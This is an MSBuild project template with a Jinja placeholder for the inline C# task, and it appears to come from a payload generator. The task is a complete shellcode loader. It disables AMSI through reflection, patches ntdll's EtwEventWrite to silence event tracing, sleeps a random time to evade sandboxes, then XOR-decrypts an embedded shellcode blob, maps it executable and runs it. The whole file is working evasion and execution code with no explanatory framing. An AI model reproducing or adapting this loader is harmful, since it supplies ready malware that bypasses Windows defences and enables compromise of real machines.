<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="{{ v.target_name }}">
    <{{ v.task_name }} />
  </Target>

  <UsingTask
    TaskName="{{ v.task_name }}"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
    <ParameterGroup />
    <Task>
      <Reference Include="System" />
      <Reference Include="System.Runtime.InteropServices" />
      <Using Namespace="System" />
      <Using Namespace="System.Runtime.InteropServices" />
      <Using Namespace="System.Reflection" />
      <Using Namespace="System.Threading" />
      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.IO;
        using System.Reflection;
        using System.Runtime.InteropServices;
        using System.Threading;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;

        public class {{ v.task_name }} : Task, ITask {
            [DllImport("kernel32")] static extern IntPtr {{ v.fn_valloc }}(IntPtr a, uint s, uint t, uint p);
            [DllImport("kernel32")] static extern bool VirtualProtect(IntPtr a, uint s, uint p, out uint old);

            static string B(int[] c) {
                var sb = new System.Text.StringBuilder();
                foreach (var x in c) sb.Append((char)x);
                return sb.ToString();
            }

            static void {{ v.fn_amsi }}() {
                try {
                    var t = Type.GetType(B(new int[]{ {{ v.jsc_auto_amsi_utils }} }));
                    if (t != null) {
                        var f = t.GetField(B(new int[]{ {{ v.jsc_amsi_init_fail }} }),
                            BindingFlags.NonPublic | BindingFlags.Static);
                        if (f != null) f.SetValue(null, true);
                    }
                } catch {}
            }

            static void {{ v.fn_etw }}() {
                try {
                    IntPtr ntdll = IntPtr.Zero;
                    foreach (System.Diagnostics.ProcessModule m in
                             System.Diagnostics.Process.GetCurrentProcess().Modules)
                        if (m.ModuleName.ToLower() == B(new int[]{110,116,100,108,108,46,100,108,108})) {
                            ntdll = m.BaseAddress; break;
                        }
                    if (ntdll == IntPtr.Zero) return;
                    int peo    = Marshal.ReadInt32(ntdll, 0x3C);
                    int exprva = Marshal.ReadInt32(IntPtr.Add(ntdll, peo + 0x88));
                    if (exprva == 0) return;
                    IntPtr ed  = IntPtr.Add(ntdll, exprva);
                    int nn     = Marshal.ReadInt32(ed, 0x18);
                    int nrva   = Marshal.ReadInt32(ed, 0x20);
                    int orva   = Marshal.ReadInt32(ed, 0x24);
                    int frva   = Marshal.ReadInt32(ed, 0x1C);
                    byte[] tgt = new byte[]{69,116,119,69,118,101,110,116,87,114,105,116,101,0};
                    for (int i = 0; i < nn; i++) {
                        IntPtr np = IntPtr.Add(ntdll, Marshal.ReadInt32(IntPtr.Add(ntdll, nrva + i*4)));
                        bool ok = true;
                        for (int j = 0; j < tgt.Length; j++)
                            if (Marshal.ReadByte(IntPtr.Add(np, j)) != tgt[j]) { ok = false; break; }
                        if (!ok) continue;
                        short ord = Marshal.ReadInt16(IntPtr.Add(ntdll, orva + i*2));
                        IntPtr fn = IntPtr.Add(ntdll, Marshal.ReadInt32(IntPtr.Add(ntdll, frva + ord*4)));
                        uint old; VirtualProtect(fn, 3, 0x40, out old);
                        Marshal.WriteByte(fn, 0, 0x33);
                        Marshal.WriteByte(fn, 1, 0xC0);
                        Marshal.WriteByte(fn, 2, 0xC3);
                        VirtualProtect(fn, 3, old, out old);
                        break;
                    }
                } catch {}
            }

            static byte[] {{ v.fn_decrypt }}(byte[] data, byte[] key) {
                var o = new byte[data.Length];
                for (int i = 0; i < data.Length; i++) o[i] = (byte)(data[i] ^ key[i % key.Length]);
                return o;
            }

            static byte[] {{ v.fn_hex }}(string h) {
                var b = new byte[h.Length / 2];
                for (int i = 0; i < b.Length; i++)
                    b[i] = Convert.ToByte(h.Substring(i * 2, 2), 16);
                return b;
            }

            public override bool Execute() {
                {{ v.fn_amsi }}();
                {{ v.fn_etw }}();
                Thread.Sleep(2000 + new Random().Next(3000));

                byte[] _k = {{ v.fn_hex }}({% for chunk in key_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %});
                for (int _ki = 0; _ki < _k.Length; _ki++) _k[_ki] ^= (byte){{ key_tweak }};
                byte[] sc = {{ v.fn_decrypt }}({{ v.fn_hex }}({% for chunk in shellcode_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %}), _k);

                IntPtr mem = {{ v.fn_valloc }}(IntPtr.Zero, (uint)sc.Length, 0x3000, 0x04);
                Marshal.Copy(sc, 0, mem, sc.Length);
                uint old;
                VirtualProtect(mem, (uint)sc.Length, 0x20, out old);

                var t = new Thread(() => {
                    var fn = (Action)Marshal.GetDelegateForFunctionPointer(mem, typeof(Action));
                    fn();
                });
                t.IsBackground = true;
                t.Start();
                t.Join();
                return true;
            }
        }
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
